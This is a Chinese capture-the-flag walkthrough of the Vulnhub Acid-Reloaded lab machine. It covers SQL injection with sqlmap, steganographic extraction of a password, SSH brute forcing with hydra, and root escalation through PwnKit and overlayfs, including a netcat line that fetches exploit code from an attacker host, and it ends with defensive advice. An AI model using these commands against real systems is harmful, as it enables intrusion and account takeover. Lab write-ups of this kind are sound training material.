[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+Overlayfs权限提升
字数 1078 2025-08-19 12:40:39

Acid-Reloaded 渗透测试实战教学文档

1. 信息收集阶段

1.1 目标识别

使用nmap进行初始扫描:

nmap -p- 192.168.101.158 --min-rate 1000 -sC -sV

发现开放端口:

  • 22/tcp: OpenSSH 6.7p1 Ubuntu 5ubuntu1.3
  • 33447/tcp: 未知HTTP服务

1.2 Web服务枚举

使用dirb进行目录扫描:

dirb http://192.168.101.158:33447/

发现关键路径:

  • http://192.168.101.158:33447/bin/index.php

使用gobuster进行更深入扫描:

gobuster dir -u "http://192.168.101.158:33447/bin" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php

发现重要文件:

  • dashboard.php
  • includes/validation.php
  • l33t_haxor.php

2. Web应用渗透

2.1 SQL注入漏洞利用

发现可能存在SQL注入的端点:

http://192.168.101.158:33447/bin/l33t_haxor.php?id=1

使用Arjun进行参数发现:

arjun -u http://192.168.101.158:33447/bin/l33t_haxor.php

使用sqlmap进行自动化注入:

# 枚举数据库
sqlmap -u "http://192.168.101.158:33447/bin/l33t_haxor.php?id=1" --dbs --tamper=space2comment --batch

# 枚举secure_login数据库的表
sqlmap -u "http://192.168.101.158:33447/bin/l33t_haxor.php?id=1" -D secure_login --tables --tamper=space2comment --batch

2.2 文件下载分析

发现可疑文件:

http://192.168.101.158:33447/UB3R/strcpy.exe

使用binwalk分析文件:

binwalk strcpy.exe

使用foremost提取隐藏数据:

foremost strcpy.exe
cd output

分析提取的文件:

cat audit.txt
cd rar
unrar x 00000213.rar
cat acid.txt

发现图片文件lol.jpg,进一步分析:

binwalk lol.jpg  # 检测到包含RAR数据
unrar e lol.jpg
cat hint.txt
cat Avinash.contact

解码base64凭证:

echo 'AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA='|base64 -d
# 输出: NooB@123

3. 系统访问

3.1 SSH暴力破解

使用hydra进行SSH爆破:

hydra -L /usr/share/wordlists/rockyou.txt -p 'NooB@123' ssh://192.168.101.158 -t 24

成功获取凭证:

  • 用户名: makke
  • 密码: NooB@123

4. 权限提升

4.1 Pkexec提权

查找SUID文件:

find / -perm -4000 -type f 2>/dev/null

发现pkexec可利用,准备PwnKit利用代码:

# 在攻击机准备PwnKit.c
nc -lvnp 10033 > PwnKit.c

# 在目标机接收并编译
nc <attacker_ip> 10033 < PwnKit.c
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
./PwnKit

4.2 OverlayFS提权

直接执行overlayfs利用程序:

cd /bin
./overlayfs

5. 后渗透与Flag获取

获取root权限后查看flag:

cat /root/.flag.txt
# 输出: Black@Current@Ice-Cream

6. 技术要点总结

  1. SQL注入利用

    • 使用space2comment绕过过滤
    • 自动化提取数据库信息

  2. 数据隐写分析

    • 使用binwalk检测隐藏数据
    • foremost提取嵌入文件
    • 多层嵌套数据提取(RAR中嵌入图片,图片中嵌入RAR)

  3. 凭证获取

    • 从隐藏文件中发现base64编码凭证
    • 解码后用于SSH爆破

  4. 权限提升技术

    • Pkexec本地提权(CVE-2021-4034)
    • OverlayFS漏洞利用

  5. 工具链使用

    • nmap/dirb/gobuster用于信息收集
    • arjun/sqlmap用于Web渗透
    • binwalk/foremost用于数据提取
    • hydra用于凭证爆破

7. 防御建议

  1. Web应用:

    • 修复SQL注入漏洞
    • 避免敏感信息暴露在Web目录
    • 禁用不必要的PHP功能

  2. 系统安全:

    • 及时更新pkexec等系统组件
    • 禁用或更新易受攻击的OverlayFS实现
    • 限制SUID二进制文件

  3. 数据安全:

    • 避免在文件中存储明文或简单编码的凭证
    • 实施严格的访问控制
Acid-Reloaded 渗透测试实战教学文档 1. 信息收集阶段 1.1 目标识别 使用nmap进行初始扫描: 发现开放端口: 22/tcp: OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 33447/tcp: 未知HTTP服务 1.2 Web服务枚举 使用dirb进行目录扫描: 发现关键路径: http://192.168.101.158:33447/bin/index.php 使用gobuster进行更深入扫描: 发现重要文件: dashboard.php includes/validation.php l33t_ haxor.php 2. Web应用渗透 2.1 SQL注入漏洞利用 发现可能存在SQL注入的端点: 使用Arjun进行参数发现: 使用sqlmap进行自动化注入: 2.2 文件下载分析 发现可疑文件: 使用binwalk分析文件: 使用foremost提取隐藏数据: 分析提取的文件: 发现图片文件lol.jpg,进一步分析: 解码base64凭证: 3. 系统访问 3.1 SSH暴力破解 使用hydra进行SSH爆破: 成功获取凭证: 用户名: makke 密码: NooB@123 4. 权限提升 4.1 Pkexec提权 查找SUID文件: 发现pkexec可利用,准备PwnKit利用代码: 4.2 OverlayFS提权 直接执行overlayfs利用程序: 5. 后渗透与Flag获取 获取root权限后查看flag: 6. 技术要点总结 SQL注入利用 : 使用space2comment绕过过滤 自动化提取数据库信息 数据隐写分析 : 使用binwalk检测隐藏数据 foremost提取嵌入文件 多层嵌套数据提取(RAR中嵌入图片,图片中嵌入RAR) 凭证获取 : 从隐藏文件中发现base64编码凭证 解码后用于SSH爆破 权限提升技术 : Pkexec本地提权(CVE-2021-4034) OverlayFS漏洞利用 工具链使用 : nmap/dirb/gobuster用于信息收集 arjun/sqlmap用于Web渗透 binwalk/foremost用于数据提取 hydra用于凭证爆破 7. 防御建议 Web应用: 修复SQL注入漏洞 避免敏感信息暴露在Web目录 禁用不必要的PHP功能 系统安全: 及时更新pkexec等系统组件 禁用或更新易受攻击的OverlayFS实现 限制SUID二进制文件 数据安全: 避免在文件中存储明文或简单编码的凭证 实施严格的访问控制